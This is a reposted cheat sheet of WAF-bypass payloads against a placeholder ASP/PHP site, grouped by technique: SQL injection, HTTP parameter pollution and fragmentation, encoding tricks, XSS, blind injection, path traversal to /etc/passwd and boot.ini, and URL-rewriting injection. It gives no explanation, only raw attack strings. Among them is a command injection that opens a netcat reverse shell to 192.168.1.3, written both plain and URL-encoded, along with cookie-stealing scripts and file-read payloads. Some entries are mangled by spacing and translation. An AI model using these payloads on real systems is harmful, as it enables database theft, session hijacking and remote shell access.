Original source: http://www.cnblogs.com/r00tgrok/articles/3860093.html
1. Identify vulnerability points
Http://www.site.com.tr/uyg.asp?id=123 ' +union+selec+1,2,3--
Http://www.site.com.tr/uyg.asp?id=123 '
Http://www.site.com.tr/uyg.asp?id=123<12 ("/>
2. HTTP Parameter Pollution (HPP)
http://www.site.com.tr/uyg.asp?id=123&id=456
Http://www.site.com.tr/uyg.asp?id=123+select+1,2,3+from+table
Http://www.site.com.tr/uyg.asp?id=123+select+1&id=2,3+from+table
Http://www.site.com.tr/uyg.asp?id=select/&id=/user&id=pass/&id=/from/*&id=*/users id=select/*,* /user,pass/*,*/from/*,*/users
3. HTTP parameter Fragmentation (HPF)
Uyg.asp?brandid=123+union/*&prodid=*/select+user,pass/*&price=*/from users--
SELECT * from Table1.markt where brand=123 union/* and prodid=*/select username,pass/*order by*/from users--
4. Encoding
URL Encode-%27
Double URL Encode-%2527
UTF-8 (2 bytes)-%c0%a7
UTF-8 (JAVA)-\uc0a7
HTML Entity-'
HTML Entity number-& #27;
Decimal-& #39
Unicode URL Encoding-%u0027
base64-jw==
Uyg.asp?id=<script>alert (1) </script>
uyg.asp?id=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
uyg.asp?id=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573% 2563%2572%2569%2570%2574%253e
Uyg.asp?id=%3cscript%3ealert (1)%3c%2fscript%3c
Uyg.asp?id=%3cscript%3ealert (1)%3c/script%3c
uyg.asp?id=%3cscript%3ealert%281%29%3c%2fscript%3c
Uyg.asp?id=%%3c%2fscript%3e%3cscript%3ealert (1)%3c%2fscript%3e
Uyg.asp?id=%a2%be%bcscript%bealert (1)%bc/script%be
Uyg.asp?id=<a href= "javas& #99;ript& #35; alert (1);" >
uyg.asp?id=phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg==
uyg.asp?id=data:text/html;base64,phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg==
uyg.asp?id=0;data:text/html;base64,phnjcmlwdd5hbgvydcgwktwvc2nyaxb0pg== "+http-equiv=" Refresh ""
uyg.asp?id=123 or ' 1 ' = ' 1
uyg.asp?id=123%20or%20%271%27=%271
Uyg.asp?id=123%20or%20%c0%a7%c01%a71=%c0%a71
Uyg.asp?id=123%2527%2520select%2520convert (int,@ @servername)--
uyg.asp?id=123k29ykycxjz0nmq==
UYG.ASP?ID=123;NC-E/bin/bash 192.168.1.3 12345;
Uyg.asp?id=%61%3b%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%31%2e%33%20%31%32%33 %34%35%3b
5. Script tag
uyg.asp?id= "+onmouseover=" window.location= ' http://www.site.com.tr/ Code.js '
uyg.asp?id= ' +style%3d ' x%3aexpression (alert (1) +
uyg.asp?id= "+onkeypress=" alert (+)
uyg.asp?id=123); alert (document.cookie);//
Uyg.asp?id=javascript:alert (1)
Uyg.asp?id=alert (document.cookie)
Uyg.asp?id =alert (document[' cookie ')
Uyg.asp?id=with (document) alert (cookie)
uyg.asp?id= "; location=location.hash)// #0 ={};alert (0)
uyg.asp?id=//"; Alert (String.fromCharCode (88,83,83))
Uyg.asp?id=%f6%3cimg+onmouseover= Prompt (/test/)//%f6%3e
uyg.asp?id=% '});%0 Aalert (1);%20//
uyg.asp?id=% "; eval (unescape (location))//#%0aalert (0)
Uyg.asp?id=0;url=javascript:alert (1 "http-equiv=" Refresh ""
uyg.asp?id=onerror= "Javascript:decipher (document.forms.cipher); alert ( Document.forms.cipher.stream.value); Document.forms.cipher.stream.value = Document.forms.cipher.stream_copy.value;
Uyg.php?id=<script>string.fromcharcode (</script>)
Uyg.php?id=10+union+select+load_file (0x2f6574632f706173737764)
Uyg.asp?id=if (substring (USER (), 1,4) =0x726f6f74,sleep (5), 1)
6. Cross-site Scripting
Uyg.asp?id=
Uyg.asp?id=<object data= "Javascript:alert (1)" >
Uyg.asp?id=<object><param name= "src" value= "Javascript:alert (1)" ></param></object>
Uyg.asp?id=<isindex type=image src=1 Onerror=alert (1) >
Uyg.asp?id=<isindex Action=javascript:alert (1) type=image>
Uyg.asp?id=
Uyg.asp?id=<meta style= "xss:expression (Open (Alert (1)))/>
Uyg.asp?id=<!</textarea <body onload= ' alert (1) ' >
uyg.asp?id=</style=?=-=expression\28write (12345) \29>
Uyg.asp?id=<script>document.write (1) </script>
Uyg.asp?id=
Uyg.asp?id=<script<{alert (1)}/></script>
Uyg.asp?id= ">alert (String.fromCharCode (88,83,83));
Uyg.asp?id=</xss/*-*/style=xss:e/**/xpression (Alert (1)) >
Uyg.asp?id=<//style=x:e/**/xpression (Alert (' XSS ')) >
Uyg.asp?id=<object+data= "data:text/html;base64,phnjcmlwdd5hbgvydcgxktwvc2nyaxb0pg==" ></object>
7. Blind Injection
Uyg.asp?id=1+and+ascii (Lower (substring (select+pwd+from+users+limit+1,1), 1, 1)) =74--
Uyg.asp?id=1+and+ascii (Lower (Mid ((select+pwd+from+users+limit+1,1), 1, 1)) =74--
Uyg.asp?id=1+and+ascii (' a ') =97
Uyg.asp?id=1+and+hex (' a ') =61
Uyg.asp?id=ord (' a ') = 97
Uyg.asp?id=if (substring (USER (), 1,4) = ' root ', BENCHMARK (100000000,rand ()), 1)--
Uyg.asp?id=if (substring (USER (), 1,4) = ' root ', SLEEP (5), 1)--
Uyg.asp?id=123 ' and (select pass from users limit 1) = ' pass--
8. Other injections
Uyg.asp?id=123+and+1=1
Uyg.asp?id=123+&&+1=1
Uyg.asp?id= ' = '
UYG.ASP?ID=123+AND+MD5 (' a ')! = MD5 (' a ')
Uyg.asp?id=123+and+len (@ @version) >1
Uyg.asp?id=1 ' | | 1= ' 1
uyg.asp?id=123 ' +like+ ' 123
uyg.asp?id=123 ' +not+like+ ' 1234
Uyg.asp?id= ' aaa ' <> ' BBB '
Uyg.asp?id=123+1-1 (id=123)
Uyg.asp?id=123+1 (id=124)
Uyg.asp?id=123+len (1234)-len (123) (id=124)
Uyg.asp?id=123+len (@ @server)-len (@ @server)
uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1/*union*/union/*select*/select+1,2,3/*
uyg.php?id=1%2520union%2520select%25201,2,3/*
uyg.php?id=1%0aunion%0aselect%0a1,2,3/*
uyg.php?id=1/**/union%a0select/**/1,pass,3 ' A ' from ' users '
Uyg.php?id= (0) union (SELECT (TABLE_SCHEMA), TABLE_NAME, (0) from (information_schema.tables) have ((Table_schema) Like (0x74657374) && (table_name)! = (0x7573657273))) #
Uyg.php?id=union (select (version ()))--
uyg.php?id=123/*! UNION ALL Select version () */--
Uyg.php?id=123/*!or*/1=1;
uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1+union+select+1,2,3--
uyg.php?id=1+union+select+1,2,3#
uyg.php?id=1+union+select+1,2,3;%0 0
Uyg.php?id=%3cscript%3ealert (Document.cookie)%3c/script%00testtest%3e
Uyg.php?id=%3cscript%3ealert (Document.cookie)%3c/script%20testtest%3e
Uyg.php?id= "; eval (unescape (location))//#%0aalert (0)
Uyg.php?file=. /.. /.. /.. /.. /etc/passwd/////[...] /////
Uyg.php?file=. /.. /.. /.. /.. /etc/passwd//////////////
Uyg.php?file=.//././/././/./boot.ini uyg.php?id%00testtest=1+union+select+1,2,3
uyg.php?id%20testtest=1+union+select+1,2,3
uyg.php?id=1234& "><script>alert (1) </script>=1234
Uyg.php?id=%00><script>alert (123) </script>
9. URL Rewriting
http://localhost/uyg/id/123+or+1=1/tp/456
[Repost] SQL injection and XSS WAF-bypass test vectors